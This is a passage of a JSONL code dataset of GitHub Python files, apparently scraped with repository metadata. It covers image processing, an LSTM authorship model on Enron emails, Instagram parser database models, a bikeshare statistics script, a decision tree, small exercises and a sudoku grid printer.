[5,6,7,8,9,10,11,12,13, 14, 15, 16, 17,18,19,20,21,22,23,24,25,26,27,28,29],}\n\n # delete any previous object folders\n folder_name = \"../data/CdSpritesplus/{}/\".format(cfg.split(\"_\")[-1].split(\".json\")[0])\n prep_dir(folder_name)\n specs = config_parser.parse_specs()\n\n # extract_label_groups(label_groups=specs[\"train\"], folder_name=folder_name + \"train/\", latent_spec=latent_spec,\n # mappings=mappings, args=args)\n images = glob.glob(os.path.join(folder_name, '*/*/*.png'))\n imgs = []\n captions = []\n for ind, i in enumerate(images):\n print(\"Compressing dataset image {}/{}\".format(ind, len(images)))\n im = cv2.imread(i)\n imgs.append(im)\n caption = os.path.basename(os.path.dirname(i)).replace(\"_\", \" \")\n if \"level1\" in cfg:\n caption = caption.split(\" \")[-1]\n elif \"level2\" in cfg:\n caption = \" \".join([caption.split(\" \")[0],caption.split(\" \")[-1]])\n captions.append(caption)\n hf = h5py.File(os.path.join(folder_name, 'traindata.h5'), 'w')\n hf.create_dataset('image', data=np.asarray(imgs))\n hf.create_dataset('text', data=captions)\n hf.close()\n\n\n","repo_name":"gabinsane/multimodal-vae-comparison","sub_path":"multimodal_compare/data_proc/cdSprites.py","file_name":"cdSprites.py","file_ext":"py","file_size_in_byte":12261,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"48"} +{"seq_id":"73843442067","text":"\"\"\"\n License: GPL\n\n This program is free software; you can redistribute it and/or\n modify it under the terms of the GNU General Public License 2\n as published by the Free Software Foundation.\n\n This program is distributed in the hope that it will be useful,\n but WITHOUT ANY WARRANTY; without even the implied warranty of\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n GNU General Public License for more details.\n\n You should have received a copy of the GNU General Public License\n along with this program; if not, write to the Free Software\n Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.\n\"\"\"\n\nfrom skimage import io\nfrom os import walk\nfrom os import path\n\nfrom skimage.color import rgb2grey\nfrom skimage import exposure\nfrom skimage.restoration import denoise_tv_chambolle\n\nfrom skimage.filters import threshold_adaptive\nfrom skimage.color import rgb2gray\nfrom skimage.morphology import skeletonize_3d, remove_small_objects, skeletonize\nfrom scipy.misc import toimage\nfrom scipy.ndimage import convolve\nfrom skimage.transform import probabilistic_hough_line\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\nclass KirschImageProcessing():\n def __init__(self):\n # kernelG1\n self.N = np.array([[5, 5, 5],\n [-3, 0, -3],\n [-3, -3, -3]], dtype=np.float32)\n\n # kernelG2\n self.NW = np.array([[5, 5, -3],\n [5, 0, -3],\n [-3, -3, -3]], dtype=np.float32)\n\n # kernelG3\n self.W = np.array([[5, -3, -3],\n [5, 0, -3],\n [5, -3, -3]], dtype=np.float32)\n\n # kernelG4\n self.SW = np.array([[-3, -3, -3],\n [5, 0, -3],\n [5, 5, -3]], dtype=np.float32)\n\n # kernelG5\n self.S = np.array([[-3, -3, -3],\n [-3, 0, -3],\n [5, 5, 5]], dtype=np.float32)\n\n # kernelG6\n self.SE = np.array([[-3, -3, -3],\n [-3, 0, 5],\n [-3, 5, 5]], dtype=np.float32)\n\n # kernelG7\n self.E = np.array([[-3, -3, 5],\n [-3, 0, 5],\n [-3, -3, 5]], dtype=np.float32)\n\n # kernelG8\n self.NE = np.array([[-3, 5, 5],\n [-3, 0, 5],\n [-3, -3, -3]], dtype=np.float32)\n\n self.kernels = [self.N, self.NW, self.W,\n self.SW, self.S, self.SE,\n self.E, self.NE]\n\n def saveImage(self, img, savePath):\n # Guarda en blanco y negro\n toimage(img, cmin=False, cmax=True).save(savePath)\n\n def saveFigure(self, fig, path):\n fig.savefig(path, dpi=300, frameon=False, bbox_inches='tight', pad_inches=0.0)\n\n def loadImage(self, path):\n return io.imread(path)\n\n def loadImagesFrom(self, package):\n \"\"\"\n Cargar imágenes dada la ruta de una carpeta. 
Carga también las imágenes en subcarpetas\n @param package - ruta a una carpeta\n @return data - diccionario nombre-imagen con las imágenes cargadas\n \"\"\"\n data = dict()\n for root, dirs, files in walk(package):\n for name in files:\n if '.jpg' in name.lower() or '.jpeg' in name.lower() or '.bmp' in name.lower() or 'tiff' in name.lower() or '.png' in name.lower():\n data[name] = io.imread(path.join(root, name))\n return data\n\n def showImage(self, img, returnImg = False):\n fig = plt.figure(figsize=(20, 20))\n plt.imshow(img, cmap=plt.cm.gray)\n if returnImg == True:\n return fig\n\n def prepareImage(self, img, clip=0.0, nb=100, w=0.5):\n imgGray = rgb2gray(img)\n imgAdapted = exposure.equalize_adapthist(imgGray, clip_limit=clip, nbins=nb)\n imgDenoise = denoise_tv_chambolle(imgAdapted, weight=w)\n return imgDenoise\n\n def deleteSmallObjects(self, img, minLength=30, conn=50):\n img_2 = remove_small_objects(img, minLength, connectivity=conn)\n img_3 = ~np.array(img_2)\n img_4 = remove_small_objects(img_3, minLength, connectivity=conn)\n return ~np.array(img_4)\n\n def binarizeImage(self, img):\n t = threshold_adaptive(img, 1)\n return img < t\n\n def kirschProcessing(self, img, showResult=True, kernelId=2, angles=np.linspace(-0.2, 0.2, num=300),\n lineLength=30, lineGap=16,minLength=30, conn=50, saveFigure=False, savePath=False):\n # Aqui aplicamos el kernel de kirsch\n imgConvolve = convolve(img, self.kernels[kernelId])\n imgBin = self.binarizeImage(imgConvolve)\n imgRemoveSmall = self.deleteSmallObjects(imgBin, minLength, conn)\n imgSkeletonize3D = skeletonize_3d(imgRemoveSmall)\n\n # Detectar lineas\n lines = probabilistic_hough_line(imgSkeletonize3D, threshold=0, line_length=lineLength, line_gap=lineGap, theta=angles)\n\n if showResult == True:\n fig = plt.figure(figsize=(25, 25))\n plt.imshow(imgSkeletonize3D, cmap=plt.cm.gray)\n\n plt.title('Probabilistic Hough')\n for line in lines:\n p0, p1 = line\n plt.plot((p0[0], p1[0]), (p0[1], p1[1]),'r',linewidth=1)\n plt.show()\n if saveFigure == True:\n if savePath != None:\n self.saveFigure(fig, savePath)\n\n return [imgSkeletonize3D, lines]\n\n\n def kirschProcessing1D(self, img, showResult=True, kernelId=3, angles=np.linspace(0.1, 0.4, num=300),\n lineLength=30, lineGap=16,minLength=30, conn=50, saveFigure=False, savePath=False):\n # Aqui aplicamos el kernel de kirsch\n imgConvolve = convolve(img, self.kernels[kernelId])\n imgBin = self.binarizeImage(imgConvolve)\n imgRemoveSmall = self.deleteSmallObjects(imgBin, minLength, conn)\n imgSkeletonize = skeletonize(imgRemoveSmall)\n\n # Detectar lineas\n lines = probabilistic_hough_line(imgSkeletonize, threshold=0, line_length=lineLength, line_gap=lineGap, theta=angles)\n\n if showResult == True:\n fig = plt.figure(figsize=(25, 25))\n plt.imshow(imgSkeletonize, cmap=plt.cm.gray)\n\n plt.title('Probabilistic Hough')\n for line in lines:\n p0, p1 = line\n plt.plot((p0[0], p1[0]), (p0[1], p1[1]),'r',linewidth=1)\n plt.show()\n if saveFigure == True:\n if savePath != None:\n self.saveFigure(fig, savePath)\n\n return [imgSkeletonize, lines]","repo_name":"amtBurgos/Perikymata2017","sub_path":"prototypes/Pruebas y Desarrollos/ExtractLines/KirschImageProcessing.py","file_name":"KirschImageProcessing.py","file_ext":"py","file_size_in_byte":6699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31855796314","text":"class Lennuk:\n def __init__(self, lennuki_nimi, maht, kesk_kiirus, kulu):\n self.nimi = lennuki_nimi\n self.reisijate_arv = 
maht\r\n        self.keskmine_kiirus = kesk_kiirus\r\n        self.kütusekulu = kulu\r\n    \r\n\r\nclass Reis:\r\n    def __init__(self, lennuk, sihtkoht, pikkus, pileteid):\r\n        self.lendav_lennuk = lennuk\r\n        self.reisi_sihtkoht = sihtkoht\r\n        self.reisi_pikkus = pikkus\r\n        self.ostetud_piletid = pileteid\r\n    \r\n    def reisi_kestvus(self):\r\n        tunde = self.reisi_pikkus / self.lendav_lennuk.keskmine_kiirus\r\n        return int(round(tunde * 60, 0))\r\n    \r\n    def vabu_kohti(self):\r\n        return self.lendav_lennuk.reisijate_arv - self.ostetud_piletid\r\n    \r\n    \r\n    def osta_pilet(self):\r\n        if self.vabu_kohti() > 0:\r\n            self.ostetud_piletid += 1\r\n            print(\"Pilet ostetud\")\r\n        else:\r\n            print(\"Lend on välja müüdud\")\r\n    \r\n    \r\n    def reisi_kütusekulu(self):\r\n        return int(round(self.lendav_lennuk.kütusekulu * self.ostetud_piletid * self.reisi_pikkus / 100, 0))\r\n    \r\n    \r\nlennuk = Lennuk(\"Boeing-767\", 123, 800, 4)\r\nreis = Reis(lennuk, \"Madrid\", 3500, 110)\r\n\r\nprint(\"Reisi kestvus on\", reis.reisi_kestvus(), \"minutit\")\r\nprint(\"Vabade kohtade arv reisile sihtkohta Madrid on\", str(reis.vabu_kohti()), \".\")\r\nreis.osta_pilet()\r\nprint(\"Vabade kohtade arv reisile sihtkohta Madrid on\", str(reis.vabu_kohti()), \".\")\r\nprint(\"Kütusekulu lendamiseks sihtkohta\", reis.reisi_sihtkoht, \"on\", reis.reisi_kütusekulu(), \"liitrit.\")\r\n\r\n","repo_name":"NFilin10/TU_programming_course","sub_path":"praksid/praks_12/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":1509,"program_lang":"python","lang":"et","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"71505710225","text":"import re\nimport sys\n\ndef main():\n    print(convert(input(\"Hours: \")))\n    sys.exit()\n\ndef convert(s):\n    blocks = re.search(r\"^(\\d+|\\d+:\\d+) (PM|AM) to (\\d+|\\d+:\\d+) (PM|AM)$\", s)\n    if not blocks:\n        raise ValueError\n    time_1 = [blocks.group(1), blocks.group(2)]\n    time_2 = [blocks.group(3), blocks.group(4)]\n    time_1, time_2 = to_24h(time_1), to_24h(time_2)\n    return(f\"{time_1} to {time_2}\")\n\ndef to_24h(time):\n    if \":\" in time[0]:\n        hour, minutes = map(int, time[0].split(\":\"))\n    else:\n        hour, minutes = int(time[0]), 0\n\n    if hour > 12 or minutes > 59:\n        raise ValueError\n\n    if time[1] == \"AM\" and hour == 12:\n        hour = 0\n    if time[1] == \"PM\":\n        hour = int(hour) + 12\n        if hour == 24:\n            hour = 12\n\n\n    return(f\"{hour:02d}:{minutes:02d}\")\n\nif __name__ == \"__main__\":\n    main()","repo_name":"Oneiros96/cs50p","sub_path":"Week 7 - Regular Expressions/working/working.py","file_name":"working.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"39422776925","text":"from functools import reduce\n\nN = int(input())\nA = [int(input()) for _ in range(N)]\n\n# Build up the answer from the tail of the sequence\nans, _ = reduce(\n    lambda acc, i: (\n        (\n            -1 if acc[0] == -1 or A[i] < acc[1] - 1 or A[i] > i else\n            acc[0] if A[i] == acc[1] - 1 else\n            acc[0] + A[i]\n        ),\n        A[i]\n    ),\n    reversed(range(N)),\n    (0, 0)\n)\n\nprint(ans)\n","repo_name":"wotsushi/competitive-programming","sub_path":"agc/024/c.py","file_name":"c.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"}
{"seq_id":"36658920287","text":"import numpy as np\nimport cPickle\nfrom collections import defaultdict\nimport re\nimport random\nimport sys\nimport os\n\nos.environ['KERAS_BACKEND']='tensorflow'\n\nfrom keras.preprocessing.text import Tokenizer, text_to_word_sequence\nfrom keras.preprocessing.sequence import pad_sequences\nfrom keras.utils.np_utils import 
to_categorical\n\nfrom keras.layers import Embedding\nfrom keras.layers import Dense, Input, Flatten\nfrom keras.layers import Conv1D, MaxPooling1D, Embedding, Merge, Dropout, LSTM, GRU, Bidirectional, TimeDistributed\nfrom keras.layers.normalization import BatchNormalization\nfrom keras.layers import merge\nfrom keras.layers import concatenate\n\nfrom keras.models import Model\nfrom keras import backend as K\nfrom keras.engine.topology import Layer, InputSpec\nfrom keras.callbacks import Callback\n\nmax_sen_len = 100\nmax_sents = 30\nemb_dim = 100\nval_split = 0.2\n\nlines = []\nlabels = []\ntexts = []\nf_names = []\nstyle_vectors = []\nscd = []\nstyle_dict = {}\nclasses = []\nclass_labels = {}\nclass_ind = 0\nstyle_train = []\nstyle_val = []\n\n# Input the stylometric features \nwith open(\"./extracted_features/stylometricVector.txt\", \"r\") as sv:\n for line in sv:\n scd = line.split(',')\n s_key = scd[0] + \"/\" + scd[1]\n\n s_value = map(float, scd[2:])\n\n style_dict[s_key] = s_value\n\n# Input the class labels\nfor author_dir in os.listdir('clean_enron'):\n if author_dir == '.DS_Store':\n continue\n classes.append(author_dir)\n class_labels[author_dir] = class_ind\n class_ind += 1\n\n# Input the contents of each email\nfor author_dir in os.listdir('clean_enron'):\n if author_dir == '.DS_Store':\n continue\n for message_file in os.listdir('./clean_enron/' + author_dir):\n with open('./clean_enron/' + author_dir + '/' + message_file, 'r') as f:\n text = f.read()\n sentences = text.lower().split('\\n')\n lines.append(sentences) \n text = text.lower().replace(\"\\n\", \" \")\n labels.append(class_labels[author_dir])\n texts.append(text)\n f_names.append(author_dir + '/' + message_file)\n if author_dir + '/' + message_file not in style_dict :\n style_vectors.append([0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0 ])\n else :\n style_vectors.append(style_dict[ author_dir + '/' + message_file ])\n \n# Convert stylometric feature vector to numpy array\nstyle_vectors = np.array(style_vectors)\n\n# Normalize the numerical feature vectors\nstyle_vectors = style_vectors / style_vectors.max(axis=0)\n\n#Tokenization\ntokenizer = Tokenizer()\ntokenizer.fit_on_texts(texts)\ndata = np.zeros((len(texts), max_sents, max_sen_len), dtype='int32')\nfor i, sentences in enumerate(lines):\n for j, sent in enumerate(sentences):\n if j< max_sents:\n wordTokens = text_to_word_sequence(sent)\n k = 0\n for _, word in enumerate(wordTokens):\n if k < max_sen_len:\n data[i, j, k] = tokenizer.word_index[word]\n k = k + 1 \nword_index = tokenizer.word_index\nlabels = to_categorical(np.asarray(labels))\n\n# Randomly shuffle the data\nindices = np.arange(data.shape[0])\nnp.random.shuffle(indices)\ndata = data[indices]\nlabels = labels[indices]\nstyle_vectors = style_vectors[indices]\n\n# Split the data as training and validation\nnb_validation_samples = int(val_split * data.shape[0])\nx_train = data[:-nb_validation_samples]\ny_train = labels[:-nb_validation_samples]\nx_val = data[-nb_validation_samples:]\ny_val = labels[-nb_validation_samples:]\nstyle_train = style_vectors[:-nb_validation_samples]\nstyle_val = style_vectors[-nb_validation_samples:]\n\n## Performance metrics\n\n# F1 score\nf1_scores = []\n\n# Precision\nprecisions = []\n\n# Recall\nrecalls = []\n\n# Create embeddings\nembeddings_index = {}\nwith open('glove.6B.100d.txt') as f:\n for line in f:\n values = line.split()\n word = values[0]\n coefs = np.asarray(values[1:], dtype='float32')\n embeddings_index[word] = coefs\n\nembedding_matrix = 
np.random.random((len(word_index) + 1, emb_dim))\nfor word, i in word_index.items():\n embedding_vector = embeddings_index.get(word)\n if embedding_vector is not None:\n # words not found in embedding index will be all-zeros.\n embedding_matrix[i] = embedding_vector\n \n# Embedding layer\nembedding_layer = Embedding(len(word_index) + 1,\n emb_dim,\n weights=[embedding_matrix],\n input_length=max_sen_len,\n trainable=True)\n\n# Bidirectional LSTM\nsentence_input = Input(shape=(max_sen_len,), dtype='int32')\nembedded_sequences = embedding_layer(sentence_input)\nl_lstm = Bidirectional(LSTM(100))(embedded_sequences)\n\n# Bidirectional LSTM\nsentEncoder = Model(sentence_input, l_lstm)\nemail_input = Input(shape=(max_sents,max_sen_len), dtype='int32')\nemail_encoder = TimeDistributed(sentEncoder)(email_input)\nl_lstm_sent = Bidirectional(LSTM(100))(email_encoder)\n\n# Input the stylometric feature\nauxiliary_input = Input(shape=(8,))\n\n# Concatenate with lstm output\nx_new = concatenate([l_lstm_sent, auxiliary_input])\n\n# Dense layer\ndense_1 = Dense(128, activation='relu')(x_new)\n\n# Dropout layer\ndrop_1 = Dropout(0.3)(dense_1)\n\n# Final Dense layer\npreds = Dense(10, activation='softmax')(drop_1)\n\n# Model\nmodel = Model(inputs=[email_input, auxiliary_input], outputs=preds)\n\n# Compile the model\nmodel.compile(loss='categorical_crossentropy', optimizer='rmsprop', metrics=['acc'])\n\n# Summarize the model\nmodel.summary()\n\n# Fit the model\nmodel.fit(x=[x_train, style_train], y=y_train, validation_data=([x_val, style_val], y_val), epochs=30, batch_size=50)","repo_name":"IamAdiSri/auth-id","sub_path":"models/HierLSTM_withStylometry.py","file_name":"HierLSTM_withStylometry.py","file_ext":"py","file_size_in_byte":5738,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"48"} +{"seq_id":"42793419623","text":"from DecisionTree import *\nfrom helper import *\nfrom crossValidation import *\nfrom sklearn.model_selection import train_test_split\n\nopz = int(input(\"Scegli il dataset che vuoi usare tra 1,2,3: \"))\n\nif opz == 1:\n path = \"https://archive.ics.uci.edu/ml/machine-learning-databases/iris/iris.data\"\n continuous_attrs = [0, 1, 2, 3]\n X, y, df = load_data(path, True, continuous_attrs)\n df.columns = [\"sepal_length\", \"sepal_width\", \"petal_length\", \"petal_width\", \"class\"]\nelif opz == 2:\n path = \"https://archive.ics.uci.edu/ml/machine-learning-databases/zoo/zoo.data\"\n X, y, df = load_data(path, False)\n df.columns = [\n \"animal_name\",\n \"hair\",\n \"feathers\",\n \"eggs\",\n \"milk\",\n \"airbone\",\n \"aquatic\",\n \"predator\",\n \"toothed\",\n \"backbone\",\n \"breathes\",\n \"venomous\",\n \"fins\",\n \"legs\",\n \"tail\",\n \"domestic\",\n \"catsize\",\n \"class\",\n ]\n df = df.drop(\"animal_name\", axis=1)\nelif opz == 3:\n path = \"https://archive.ics.uci.edu/ml/machine-learning-databases/00244/fertility_Diagnosis.txt\"\n continuous_attrs = [1, 6, 8]\n X, y, df = load_data(path, True, continuous_attrs)\n df.columns = [\n \"season_analysis_performed\",\n \"age_volunteer\",\n \"childish_diseases\",\n \"accident\",\n \"surgical_intervention\",\n \"high_fevers\",\n \"alcohol_consumption\",\n \"smoking\",\n \"hours_sitting\",\n \"class\",\n ]\n\nDecision = DecisionTree(df, list(df.columns))\n#print_tree(Decision.tree, df, list(df.columns))\nnodes, edges = bfs(Decision.tree)\n\ndot = graphviz.Digraph(comment=\"BFS Tree\")\nfor node in nodes:\n label = f\"{node.attribute}\" if node.attribute else f\"{node.label}\"\n shape = 
\"ellipse\" if node.is_leaf else \"box\"\n color = \"green\" if node.is_leaf else \"lightblue\"\n dot.node(str(node), label=label, shape=shape, color=color)\nfor edge in edges:\n dot.edge(str(edge[0]), str(edge[1]), label=str(edge[2]))\n\ndot.render(\"./img/bfs_tree.gv\", format=\"png\")\nprint(\"Cross validation error: \", cross_validation(df, 10))\n","repo_name":"dvrkoo/AIMA-Decision-Tree","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22519349615","text":"from datetime import datetime\n\nfrom sqlalchemy import BigInteger, Boolean, Column, ForeignKey, Integer, String, UniqueConstraint\nfrom sqlalchemy.dialects.postgresql import TIMESTAMP\nfrom sqlalchemy.ext.declarative import declarative_base\n\n\nBase = declarative_base()\n\n\nclass IdMixin:\n id = Column(Integer, primary_key=True) # noqa: A003\n\n\nclass InstagramAccounts(Base, IdMixin):\n __tablename__ = 'instagram_accounts'\n\n credentials = Column(String(255), unique=True)\n cookies = Column(String(5000))\n user_agent = Column(String(255))\n proxy = Column(String(255), nullable=True)\n last_used_at = Column(type_=TIMESTAMP(timezone=True), nullable=True)\n daily_usage_rate = Column(Integer, default=0)\n\n\nclass InstagramLogins(Base, IdMixin):\n __tablename__ = 'instagram_logins'\n\n username = Column(String(255), unique=True)\n user_id = Column(BigInteger, unique=True)\n followers = Column(BigInteger, nullable=True)\n is_exists = Column(Boolean, nullable=True)\n created_at = Column(type_=TIMESTAMP(timezone=True), default=datetime.utcnow)\n updated_at = Column(type_=TIMESTAMP(timezone=True), nullable=True)\n posts_updated_at = Column(type_=TIMESTAMP(timezone=True), nullable=True)\n\n\nclass Proxies(Base, IdMixin):\n __tablename__ = 'proxies'\n\n proxy = Column(String(255), unique=True)\n type = Column(String(255)) # noqa: A003\n\n\nclass ParserResult(Base, IdMixin):\n __tablename__ = 'parser_result'\n\n user_id = Column(BigInteger, ForeignKey('instagram_logins.user_id'), nullable=True)\n marketplace = Column(String(255), nullable=True)\n story_publication_date = Column(type_=TIMESTAMP(timezone=True), nullable=True)\n sku = Column(BigInteger, nullable=True)\n ad_type = Column(String(255), nullable=True)\n is_checked = Column(Boolean, default=False)\n created_at = Column(type_=TIMESTAMP(timezone=True), default=datetime.utcnow)\n\n __table_args__ = (UniqueConstraint('story_publication_date', 'sku'),)\n\n\nclass ParserResultPost(Base, IdMixin):\n __tablename__ = 'parser_result_post'\n\n user_id = Column(BigInteger, ForeignKey('instagram_logins.user_id'))\n post_id = Column(BigInteger, unique=True)\n link = Column(String, nullable=True)\n comments_count = Column(Integer, nullable=True)\n likes_count = Column(Integer, nullable=True)\n publication_date = Column(type_=TIMESTAMP(timezone=True))\n created_at = Column(type_=TIMESTAMP(timezone=True), default=datetime.utcnow)\n\n\nclass InstSkuPerPost(Base, IdMixin):\n __tablename__ = 'inst_sku_per_post'\n\n parser_result_post_id = Column(Integer, ForeignKey('parser_result_post.id'))\n marketplace = Column(String(255), nullable=True)\n sku = Column(BigInteger)\n is_checked = Column(Boolean, default=False)\n brand = Column(String(255), nullable=True)\n brand_id = Column(BigInteger, 
nullable=True)\n","repo_name":"voviz/instagram-parser","sub_path":"src/db/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2839,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"30543259157","text":"def BMI_calculator():\n weight = float(input(\"Enter your weight in kilograms: \"))\n height = float(input(\"Enter your height in meters: \"))\n BMI = weight / (height ** 2)\n print(\"Your BMI is: \", BMI)\n if BMI < 18.5:\n print(\"You are underweight\")\n elif BMI >= 18.5 and BMI < 25:\n print(\"You are normal\")\n elif BMI >= 25 and BMI < 30:\n print(\"You are overweight\")\n elif BMI >= 30:\n print(\"You are obese\")\nBMI_calculator()","repo_name":"vivivaz/Python_pro_bootcamp","sub_path":"day3/bmi.py","file_name":"bmi.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"43749491434","text":"from statistics import mean\nimport time\nimport pandas as pd\nimport numpy as np\n\nCITY_DATA = { 'chicago': 'chicago.csv',\n 'new york city': 'new_york_city.csv',\n 'washington': 'washington.csv' }\n\ndef get_filters():\n \"\"\"\n Asks user to specify a city, month, and day to analyze.\n\n Returns:\n (str) city - name of the city to analyze\n (str) month - name of the month to filter by, or \"all\" to apply no month filter\n (str) day - name of the day of week to filter by, or \"all\" to apply no day filter\n \"\"\"\n print('Hello! Let\\'s explore some US bikeshare data!')\n # get user input for city (chicago, new york city, washington).\n # HINT: Use a while loop to handle invalid inputs\n city = (input(\"Enter the city you want to explore the data (Valid Options are Chicago, New York City, Washington)\").lower()).strip()\n errorentry = 0\n\n while city not in CITY_DATA.keys():\n errorentry += 1\n city = (input(\"Please Enter a valid input for the city from the list:Chicago, New York City, Washington\").lower()).strip()\n\n\n # get user input for month (all, january, february, ... , june)\n month = (input(\"Enter the month to explore the data(Valid options are All, January, February, March, April, May and June)\").lower()).strip()\n\n while month not in ['all', 'january', 'february', 'march', 'april', 'may', 'june']:\n month = (input(\"Please Enter a valid input for the month from the list:All, January, February', March, April, May, June\").lower()).strip()\n\n # get user input for day of week (all, monday, tuesday, ... 
sunday)\n    day = input(\"Enter day to explore the data(Valid Options are All, Monday, Tuesday, Wednesday, Thursday, Friday, Saturday, Sunday\").lower().strip()\n\n    while day not in ['all', 'monday', 'tuesday', 'wednesday', 'thursday', 'friday', 'saturday', 'sunday']:\n        day = (input(\"Please Enter a valid input for the month from the list:All, Monday, Tuesday, Wednesday, Thursday, Friday, Saturday, Sunday\").lower()).strip()\n\n    city = city.title()\n    month = month.title()\n    day = day.title()\n\n    print('-'*40)\n    return city, month, day\n\n\ndef load_data(city, month, day):\n    \"\"\"\n    Loads data for the specified city and filters by month and day if applicable.\n\n    Args:\n        (str) city - name of the city to analyze\n        (str) month - name of the month to filter by, or \"all\" to apply no month filter\n        (str) day - name of the day of week to filter by, or \"all\" to apply no day filter\n    Returns:\n        df - Pandas DataFrame containing city data filtered by month and day\n    \"\"\"\n    print ('Data Filtering based on ', city, month, day )\n    # load data file into a dataframe\n    df = pd.read_csv(CITY_DATA.get(city.lower()))\n\n    # convert the Start Time and End Time columns to datetime\n    df['Start Time'] = pd.to_datetime(df['Start Time'])\n    df['End Time'] = pd.to_datetime(df['End Time'])\n\n    # extract month and day of week from Start Time to create new columns\n    df['month'] = df['Start Time'].dt.strftime('%B')\n    df['day_of_week'] = df['Start Time'].dt.strftime('%A')\n\n    if month != 'All':\n        df = df[df['month'] == month]\n    if day != 'All':\n        df = df[df['day_of_week'] == day]\n    \n    return df\n\n\ndef time_stats(df):\n    \"\"\"Displays statistics on the most frequent times of travel.\"\"\"\n\n    print('\\nCalculating The Most Frequent Times of Travel...\\n')\n    start_time = time.time()\n\n    # display the most common month\n    popular_month = df['month'].mode()[0]\n    print('Most Popular Start month:', popular_month)\n\n\n    # display the most common day of week\n    popular_day = df['day_of_week'].mode()[0]\n    print('Most Popular Day of week:', popular_day)\n\n    # display the most common start hour\n    popular_hour = (df['Start Time'].dt.strftime('%-H')).mode()[0]\n    print('Most Popular Start Hour:', popular_hour)\n\n\n    print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n    print('-'*40)\n\n\ndef station_stats(df):\n    \"\"\"Displays statistics on the most popular stations and trip.\"\"\"\n\n    print('\\nCalculating The Most Popular Stations and Trip...\\n')\n    start_time = time.time()\n\n    # display most commonly used start station\n    popular_start_station = df['Start Station'].mode()[0]\n    print('Most Popular Start Station:', popular_start_station)\n\n\n    # display most commonly used end station\n    popular_end_station = df['End Station'].mode()[0]\n    print('Most Popular End Station:', popular_end_station)\n\n    # display most frequent combination of start station and end station trip\n    df['Comb Station'] = df['Start Station'] + df['End Station']\n    popular_comb_station = df['Comb Station'].mode()[0]\n    print('Most Popular Trip (Start + End Station):', popular_comb_station)\n\n    print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n    print('-'*40)\n\n\ndef trip_duration_stats(df):\n    \"\"\"Displays statistics on the total and average trip duration.\"\"\"\n\n    print('\\nCalculating Trip Duration...\\n')\n    start_time = time.time()\n\n    # display total travel time\n    total_travel_time = df['Trip Duration'].sum() / 3600.0\n    print('Total Travel Time in hours:', int(total_travel_time))\n\n    # display mean travel time\n    mean_travel_time = df['Trip 
Duration'].mean() / 60.0\n print('Mean Travel Time', int(mean_travel_time))\n\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\n\ndef user_stats(df):\n \"\"\"Displays statistics on bikeshare users.\"\"\"\n\n print('\\nCalculating User Stats...\\n')\n start_time = time.time()\n\n # Display counts of user types\n user_types = df['User Type'].value_counts()\n print('User Type Counts:', user_types)\n\n\n # Display counts of gender\n try:\n gender_count = df['Gender'].value_counts()\n print('Gender count', gender_count)\n except:\n print('No Gender column exists for the selected file')\n\n # Display earliest, most recent, and most common year of birth\n try:\n earliest_birth_year = df['Birth Year'].min()\n recent_birth_year = df['Birth Year'].max()\n common_birth_year = df['Birth Year'].mode()[0]\n print('Earliest Birth Year', earliest_birth_year)\n print('Recent Birth Year', recent_birth_year)\n print('Common Birth Year',common_birth_year)\n except:\n print('No Details of Birth Year Exisits')\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\n\ndef main():\n while True:\n city, month, day = get_filters()\n df = load_data(city, month, day)\n\n time_stats(df)\n station_stats(df)\n trip_duration_stats(df)\n user_stats(df)\n\n restart = input('\\nWould you like to restart? Enter yes or no.\\n')\n if restart.lower() != 'yes':\n break\n\n\nif __name__ == \"__main__\":\n\tmain()\n","repo_name":"AnushaPanchumarthi/US-bikeshare","sub_path":"bikeshare_2.py","file_name":"bikeshare_2.py","file_ext":"py","file_size_in_byte":6829,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"8799381209","text":"from logic.get_groups import get_row\nfrom logic.types import Dimensions, Grid\nfrom colorama import init, Fore\n\ninit()\n\n\ndef grid_to_string(grid: Grid, box_dimensions: Dimensions) -> str:\n width, height = box_dimensions[\"w\"], box_dimensions[\"h\"]\n cell_num = width * height\n str_length = len(f\"{cell_num}\")\n grid_str = \"\\n\"\n for i, row in enumerate([get_row(grid, n) for n in range(len(grid))]):\n if i != 0 and i % height == 0:\n box_bottom = (\"—\" * (str_length + 1)) * box_dimensions[\"w\"] + \"—+\"\n grid_str += (box_bottom * box_dimensions[\"h\"])[:-1] + \"\\n\"\n for j, cell in enumerate(row):\n if j != 0 and j % width == 0:\n grid_str += \" |\"\n grid_str += f\" {cell}\" if cell_num < 10 or len(cell) > 1 else f\" {cell} \"\n if j + 1 == len(row):\n grid_str += f\" {Fore.CYAN}{i + 1}{Fore.RESET}\\n\"\n if i + 1 == len(grid):\n grid_str += (\" \" if cell_num < 10 else \" \" * width + \" |\") * (height - 1)\n col_indices = [\n f\" {k}\" if cell_num < 10 or k > 9 else f\" {k} \"\n for k in range(1, cell_num + 1)\n ]\n col_indices = [\n f\" {char}\" if i != 0 and i % width * 2 == 0 else char\n for 